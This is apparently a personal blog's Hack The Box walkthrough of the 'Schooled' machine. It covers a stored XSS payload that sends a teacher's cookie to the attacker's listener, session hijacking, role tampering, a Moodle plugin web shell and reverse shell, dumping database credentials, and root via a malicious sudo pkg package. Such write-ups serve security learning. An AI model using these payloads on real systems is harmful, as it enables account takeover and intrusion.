Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Post a Comment

Schooled HTB -Writeup

-

Hey guys Styx here, In this write-up I'll walk you through the steps in order to root the Schooled box. This box is rated medium and is in my opinion,a realistic scenario. Hopefully this write-up can be of educational value to you.

Let's get into it!

# Start Enum #

Like every pen-test we start off with some reconnaissance. We scan for open ports and services that are exposed by the target machine. In the picture you can see the Nmap results. 
 
nmap output
In the Nmap results we see that our target has 2 ports open.

The first thing I tried was to check for content on port 80. but our content discovery on the initial port led nowhere. so lets' enumerate possible subdomains.

 

 ## SUBDOMAIN ENUM ##

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750
A very useful and quick tool to perform this enumeration is the tool FFUF. Check it out on github.

As you can see on the pic above we got a hit on a subdomain called 'moodle'! What we need to do in order to have our machine correctly direct us to this subdomain is to add moodle.schooled.htb to our host file.

When browsing to the subdomain we come across a Moodle 3.9 installation.Moodle is a free and open-source learning management system written in PHP. For those that wish to learn more check out their website

click --> HERE

Now that we know what we are dealing with we can move on..

Let's create an account and see what functionalities we can encounter.

So set up your account and login.

When logged in we have limited rights within the application.
So we need to find a way to elevate our privileges within the application.
 

A way that we can do this is by exploiting a XSS vulnerability in the edit profile section of the application.

When looking at the posts and available we got a little nudge by the creator of this box!


This announcement is very interesting because our teacher here hints at the 'MoodleNet profile'. This is were we can inject our XSS payload. This teacher will be checking the profiles of students that enroll to his course.The dedication of this guy. We can steal his cookie and hijack his session!

Lets head over to our profile and look for the MoodleNet profile. 

Insert your XSS payload in the MoodleNet profile section.

The payload I used to catch the teachers' cookie is:

<img src=x onerror=this.src='http://<YOUR_IP>:8000/?'+document.cookie;>

spin up a quick http server by running: 

python3 -m http.server 8000 

Now that our XSS payload is set, we need to get the teacher to look at our profile in order to trigger the XSS attack and steal his cookies. All we need to do is to enroll for the math course. When you do that give it a second or 2 and watch the request come in!

XSS triggered and teacher looses his cookies :P

So replace your cookie with that of the teacher's cookie. 


Boom! we hijacked the teachers' session!

Anyway lets move on..

when researching Moodle i came accross the latest RCE!
You can find it over ---> HERE.

So in order to get this exploit to work we need to find a way to upload a zip file containing a PHP file that will be installed as a plugin. But in order to do that we need more privileges within the application. So let's get into the next steps.  

### Becoming Admin ###

So the next step it go gain access to the admin panel of the moodle installation.

So what we need to do is head over to the Maths section,browse to participants and manually add a user. So looking at what we've seen on the site is that Lianne is a manager. 


Manually add add Lianne as a user. Intercept the request and change the roleid and user role to 24 (the id of our teacher) and 1 (manager/administrator). This will elevate our privileges. 

un-edited request

edited request


When logged in as Lianne you can head over to the site administration panel.

When looking at the PoC on GitHub you can see that we can add more privileged to our account by copy and pasting the payload in the request when editing the manager role.


Intercepted request when saving manager role permissions. Blue highlighted illustrates where to paste the PoC.

copy from HERE
When you have successfully updated the privileges you now have the ability to install plugins.


Lets head over to this function and exploit it to gain access to the machine.

Find the exploit over HERE.

When uploaded you can head over to:

http://schooled.htb/blocks/rce/lang/en/block_rce.php?cmd=id

When browsing through the exploit it provides us with a simple PHP web shell.


So we now have a foothold on the box. But lets upgrade our web shell to a reverse shell. In order to do that we need to modify the block_rce.php file to set up a reverse shell instead.

  1. unzip the file. modify the block_rce.php file to your standard pentestmonkey reverse php shell;
  2. and zip the files back up with:
    zip -r -q styx.zip rce/
  3. When uploaded set up your listener and browse to:
http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php


AND WE'RE IN!


## LOCAL ENUM ##


So we can now start our local enumeration process in order to see if we can escalate our privileges on the system. 

During our local enumeration we found MySQL credentials!.



This file contained MySQL credentials. This allowed us to enumerate the database for password hashes. So after firing our queries we have some password hashes! The queries can be found in the SQL QUERIES section should you need help. 


### creds ###

moodle:PlaybookMaster2020

### SQL QUERIES ###

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show databases;'

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show tables from moodle;'

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'use moodle;select * from mdl_user;'

# Priv esc #

Access to the MySQL db turned out to be fruitful.
Looking at the hashes present, we see that the user Jamie is an admin. We could try to crack all of them but
Jamie being a more privileged user, will get us deeper into the system.

So create a file and copy and paste the hash from the database and fire up John to crack the hash.


We got a HIT!!

Jamies password = !QAZ2wsx

Now we can ssh into jamies account!

One of the first thing i like to check is sudo -l

it turns out that jamie is allowed to run sudo on the following binaries:

/usr/sbin/pkg update
/usr/sbin/pkg install *

Let's do some research!

Based on this article here, we can modify it to create a custom package and install it using sudo in order to root this box!



With this script we can automate the creation of our .txz file and we spice it up with our own goodies.
Transfer the file to the target machine and run this script as jamie. This will create the "mypackage-"2.05".txz" file. 

So to root the box all we have to do is run the following:
  1. Set up a netcat listener on attacking machine
  2. sudo pkg install --no-repo-update *.txz
 

And we are root!

I hope you enjoyed this box as much as i did and hopefully this write-up was useful to you.

See you in the next one!

Cheers - Styx










Comments

Post a Comment

Popular posts from this blog

Explore HTB - Walkthrough

-
Image
Hey peeps Styx here, This is a quick write-up on the Explore box. The box is rated as easy. But this is also the first android challange!   ____________________________________________________________________________________  # RECON # OS = Android  version =  4.9.214-android-x86_64-g04f9324  ____________________________________________________________________________________  ## PORTS ##  3 ports open  2222 tcp SSH-2.0-SSH Server - Banana Studio  44491 tcp  42135/tcp open http ES File Explorer Name Response httpd  59777 http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older  ____________________________________________________________________________________  #EXPLOITATION# The ES File Explorer service seems to have and arbitrary file read vulnerability. Link can be found  -- > here    run python3 exploit.py listPics 10.10.10.247  We can see a couple of pics in that di...
Read more

Seal HTB Walkthrough

-
Image
Hey dudes and dudettes. In this post we'll be walking through the Seal Box. This box is rated as medium.  ## RECON ## Let's start with a quick nmap and see what ports and services are open.  ____________________________________________________________________________________ PORT     STATE SERVICE    REASON  VERSION 22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1FohcrXkoPYUOtmzAh5PlCU2H0+sFcGl6XXS6vX2lLJ3RD2Vd+KlcYtc2wQLjcYJhkFe793jmkogOSh0uI+fKQA9z1Ib3J0vtsIaNkXxvSMPcr54QxXgg1guaM1OQl43ePUADXnB6WqAg8QyF6Nxoa18vboOAu3a8Wn9Qf9iCpoU93d5zQj+FsBKVaDs3zuJkUBRfjsqq7rEMpxqCfkFIeUrJF9MBsQhgsEVUbo1zicWG32m49PgDbKr9yE3lPsV9K4b9ugNQ3zwWW5a1OpOs+r3AxFcu2q65N2znV3/p41ul9+fWXo9pm0jJPJ3V5gZphDkXVZEw16K2hcgQcQJUH7luaVTRpzqDxXaiK/8wChtMXEUjFQKL6sn...
Read more